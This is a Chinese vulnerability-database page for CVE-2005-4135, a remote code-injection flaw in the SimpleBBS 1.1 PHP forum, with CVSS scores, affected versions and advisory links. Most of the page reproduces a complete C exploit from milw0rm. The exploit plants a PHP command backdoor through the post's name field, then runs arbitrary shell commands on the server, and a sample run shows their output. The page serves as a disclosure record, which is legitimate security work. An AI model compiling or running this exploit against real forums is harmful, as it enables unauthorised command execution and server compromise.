CVE-2005-4135
CVSS7.5
发布时间 :2005-12-09 10:03:00
修订时间 :2011-03-07 21:27:42
NMCOE    

[原文]Direct static code injection vulnerability in includes/newtopic.php in SimpleBBS 1.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the Host header (possibly the name parameter or variable), which is then written to data/topics.php.


[CNNVD]SimpleBBS远程命令执行漏洞(CNNVD-200512-180)

        SimpleBBS是一款开源的PHP论坛程序。
        由于没有正确的验证用户输入,远程攻击者可以在SimpleBBS服务器上执行任意PHP命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:simplemedia:simplebbs:1.1
cpe:/a:simplemedia:simplebbs:1.0.6
cpe:/a:simplemedia:simplebbs:1.0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4135
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4135
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-180
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/2807
(UNKNOWN)  VUPEN  ADV-2005-2807
http://www.securityfocus.com/bid/15764
(UNKNOWN)  BID  15764
http://www.securityfocus.com/archive/1/archive/1/418838/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051207 SimpleBBS <= v1.1 remote commands execution in c by: unitedasia security crew
http://secunia.com/advisories/17949
(VENDOR_ADVISORY)  SECUNIA  17949
http://securitytracker.com/id?1015323
(UNKNOWN)  SECTRACK  1015323

- 漏洞信息

SimpleBBS远程命令执行漏洞
高危 输入验证
2005-12-09 00:00:00 2005-12-09 00:00:00
远程  
        SimpleBBS是一款开源的PHP论坛程序。
        由于没有正确的验证用户输入,远程攻击者可以在SimpleBBS服务器上执行任意PHP命令。
        

- 公告与补丁

        

- 漏洞信息 (1361)

SimpleBBS <= 1.1 Remote Commands Execution Exploit (c code) (EDBID:1361)
php webapps
2005-12-07 Verified
0 unitedasia
N/A [点击下载]
/*

SimpleBBS <= v1.1 remote commands execution in c

coded by: unitedasia v.Dec.7.2005

greetz: iloveyouma

http://geography.about.com/library/maps/blrasia.htm
http://www.lib.utexas.edu/maps/middle_east_and_asia/asia_pol00.jpg

$ gcc -o bbs bbs.c

Usage ./bbs [host] [/folder/] [cmd]

$ ./bbs www.somesite.com /simplebbs/ 'ls%20-al;w;id;pwd'

HTTP/1.1 200 OK
Date: Wed, 07 Dec 2005 15:31:07 GMT
Server: Apache/1.3.34 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.0 FrontPage/5.0.2.2635 mod_ssl/2.8.25 OpenSSL/0.9.6b
X-Powered-By: PHP/4.4.0
Connection: close
Content-Type: text/html

161||||||1|||Winning||||||0|||Willy\\\"><!--total 188
drwxrwxrwx    2 f1       f1           4096 Dec  6 17:02 .
drwxr-xr-x    7 f1       f1           4096 Nov 17  2002 ..
-rw-r--r--    1 f1       f1            916 Oct 20 09:30 WS_FTP.LOG
-rwxrwxrwx    1 f1       f1             28 Nov 17  2002 categories.php
-rwxrwxrwx    1 f1       f1            151 Dec  7 09:11 forums.php
-rwxrwxrwx    1 f1       f1              0 Nov 17  2002 index.php
-rwxrwxrwx    1 f1       f1              0 Nov 17  2002 online.php
-rwxrwxrwx    1 f1       f1            550 Nov 17  2002 options.php
-rwxrwxrwx    1 f1       f1          28098 Dec  7 10:31 posts.php
-rwxrwxrwx    1 f1       f1            151 Dec  7 09:11 temp.php
-rw-r--r--    1 nobody   nobody      87569 Dec  6 17:03 tmp.php
-rwxrwxrwx    1 f1       f1          38089 Dec  7 10:31 topics.php
 10:31am  up 195 days, 11:35,  1 user,  load average: 0.27, 0.23, 0.16
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
root     pts/1    watcher.somesite.com 11Nov05 11:52m 16:51   0.41s  -bash
uid=99(nobody) gid=99(nobody) groups=99(nobody)
/home/f1/public_html/simplebbs/data


*/


#include <stdio.h>
#include <string.h> /* inserted /str0ke */
#include <stdlib.h> /* inserted /str0ke */
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define closesocket(s) close(s)

#define HTTP_PORT 80

#define DATA "name=Willy\\\"><!--<?php error_reporting(0);print `\\$_GET[cmd]`; die;?>&subject=Winning&message=i would like to know how each team finds the perfect aerodinamic confuguration for each circuit, i mean, how they come to the conclusion of how the wings configurated.&sendTopic=Send"


/****************** MAIN *********************/

void sendpacket(char buffer[8192], int p, char host[100]);


int main( int argc, char **argv)
{

    char buffer[8192];
    char dat[8192];
    int count;

    if(argc<4)
    {
         printf("Usage %s [host] [/folder/] [cmd]\n\nSimpleBBS <= v1.1 remote commands execution in c\ncoded by: unitedasia v.Dec.7.2005\ngreetz: iloveyouma\n",argv[0]);
         exit(1);
    }

    sprintf(dat, DATA);

    sprintf( buffer, "POST %sindex.php?v=newtopic&c=0 HTTP/1.0\nHost: %s\nContent-Type: application/x-www-form-urlencoded\nContent-Length: %d\n\n%s\n\n\n", argv[2], argv[1], strlen(dat), dat);

    sendpacket(buffer,0,argv[1]);

    sprintf( buffer, "GET %sdata/topics.php?cmd=%s HTTP/1.0\nHost: %s\n\n", argv[2], argv[3], argv[1]);

    sendpacket(buffer,1,argv[1]);

    return count;
}

void sendpacket(char buffer[8192], int p, char host[100])
{

    struct sockaddr_in server;
    struct hostent *host_info;
    unsigned long addr;
    int sock;
    char dat[8192];
    int count;

    /* create socket */
    sock = socket( PF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror( "failed to create socket");
        exit(1);
    }

    /* Create socketadress of Server
     * it is type, IP-adress and portnumber */
    memset( &server, 0, sizeof (server));

    /* convert the Servername to a IP-Adress */
    host_info = gethostbyname( host);
    if (NULL == host_info) {
        fprintf( stderr, "unknown server: %s\n", host);
        exit(1);
    }
    memcpy( (char *)&server.sin_addr, host_info->h_addr, host_info->h_length);

    server.sin_family = AF_INET;
    server.sin_port = htons( HTTP_PORT);


    /* connect to the server */
    if ( connect( sock, (struct sockaddr*)&server, sizeof( server)) < 0) {
        perror( "can't connect to server");
        exit(1);
    }

    send( sock, buffer, strlen( buffer), 0);

    /* get the answer from server and put it out to stdout */
    if (p==1) {
      do {
          count = recv( sock, buffer, sizeof(buffer), 0);
          write( 1, buffer, count);
      }
      while (count > 0);
    }

    /* close the connection to the server */
    closesocket( sock);

}

// milw0rm.com [2005-12-07]
		

- 漏洞信息

21524
SimpleBBS topics.php name Field Arbitrary Command Execution
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-12-07 Unknow
2005-12-07 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站